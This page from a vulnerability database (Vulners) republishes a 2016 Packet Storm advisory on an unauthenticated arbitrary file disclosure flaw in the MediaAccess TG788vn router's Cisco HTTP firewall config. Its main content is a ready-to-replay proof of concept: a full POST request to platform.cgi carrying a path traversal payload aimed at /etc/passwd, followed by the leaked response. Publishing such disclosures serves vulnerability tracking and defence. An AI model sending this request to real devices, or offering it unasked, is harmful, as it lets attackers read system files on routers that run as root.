Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MediaAccess TG788vn Arbitrary File Disclosure

🗓️ 06 Jan 2016 00:00:00Reported by Ahmed SultanType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

MediaAccess TG788vn Cisco firewall http config vulnerability with critical unauthenticated file disclosure

Code
`Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall  
Author : Ahmed Sultan (0x4148)  
Email : [email protected]  
  
MediaAccess TG788vn with Cisco firewall http config is vulnerable to  
critical unauthenticated file disclosure flaw,  
  
POC  
  
Request:  
POST /scgi-bin/platform.cgi HTTP/1.1  
Host: xx.xx.xx.xx  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 164  
  
button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00  
  
Response:  
HTTP/1.0 200 OK  
Date: Sat, 01 Jan 2011 00:00:45 GMT  
Server: Embedded HTTP Server.  
Connection: close  
  
loic_ipsec:x:500:500:xauth:/:/bin/cli  
  
the http server is running with root privileges , which mean that the  
attacker might escalate the exploit for further critical attacks  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jan 2016 00:00Current
0.4Low risk
Vulners AI Score0.4
mediaaccess tg788vncisco firewallfile disclosureunauthenticatedvulnerabilityhttp serverroot privilegesexploit
21